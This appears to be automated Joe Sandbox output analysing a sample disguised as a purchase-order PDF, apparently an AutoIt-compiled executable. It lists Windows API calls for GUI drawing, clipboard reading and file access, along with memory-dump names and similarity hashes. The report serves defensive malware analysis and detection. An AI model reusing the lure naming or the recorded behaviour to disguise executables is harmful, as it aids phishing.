                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                                                                                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                                                                                                                                                                                                            • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                                                                                                                                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                                                                                                                                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                                                                                                                                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                                                                                                                                                                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                                                                                                                                                                                                                                            • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                                                                                                                                                                                                                                            • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00433F70
                                                                                                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1582027408-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: b6bdd96bfb8dfd4a5be079cfa84d61e665241507efca00d9dbb6e1ee5a662276
                                                                                                                                                                                                                                                                                                            • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6bdd96bfb8dfd4a5be079cfa84d61e665241507efca00d9dbb6e1ee5a662276
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
                                                                                                                                                                                                                                                                                                            Function 0046C604 Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 216clipboardCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 589737431-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                                                                                                                                                                                            • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                                                                                                                                                                                                                                                            Function 0045657D Relevance: 38.8, APIs: 19, Strings: 3, Instructions: 287windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00456692
                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00456731
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                                                                                                                                                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                                                                                                                                                                                                                            • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                                                                                                                                                                                                                            • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                                                                                                                                                            • String ID: ($,$tooltips_class32
                                                                                                                                                                                                                                                                                                            • API String ID: 541082891-3320066284
                                                                                                                                                                                                                                                                                                            • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                                                                                                                                                                                                                                            Function 00436B3A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 190COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                                                                                                                                                                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00436B79
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00436B9F
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00436BC0
                                                                                                                                                                                                                                                                                                            • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00436C2A
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00436C31
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                                                                                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00436C62
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                            • API String ID: 1503153545-1459072770
                                                                                                                                                                                                                                                                                                            • Opcode ID: b198237b3a557a0dc967365ee625912b8cab77bf067c40fb6a507f7203d4b4d1
                                                                                                                                                                                                                                                                                                            • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b198237b3a557a0dc967365ee625912b8cab77bf067c40fb6a507f7203d4b4d1
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                                                                                                                                                                                                                            Function 00452788 Relevance: 34.8, APIs: 23, Instructions: 344COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                                                                                                                                                                                                                                            • _fseek.LIBCMT ref: 004527FC
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 0045285C
                                                                                                                                                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00452871
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 00452886
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 004528B0
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 004528C8
                                                                                                                                                                                                                                                                                                            • _wcscat.LIBCMT ref: 004528DD
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452914
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452925
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452944
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452955
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452976
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452987
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452998
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 004529A9
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                                                                                                                                                                                            • __fread_nolock.LIBCMT ref: 00452A39
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2054058615-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                                                                                                                                                                                                                                            Function 004559A8 Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 401COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                                                            • Opcode ID: 48144b4d0158fb433444caf1f3151cb1eda9c25b5f4b776f29a215d65c12511a
                                                                                                                                                                                                                                                                                                            • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48144b4d0158fb433444caf1f3151cb1eda9c25b5f4b776f29a215d65c12511a
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                                                                                                                                                                                                                                            Function 004700B0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                                                                                                                                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                                                                                                                                                                                                                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                                                                                                                                                                                                                            • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                                                                                                                                                            • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                            • API String ID: 867697134-248962490
                                                                                                                                                                                                                                                                                                            • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                                                                                                                                                                                                                                            • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
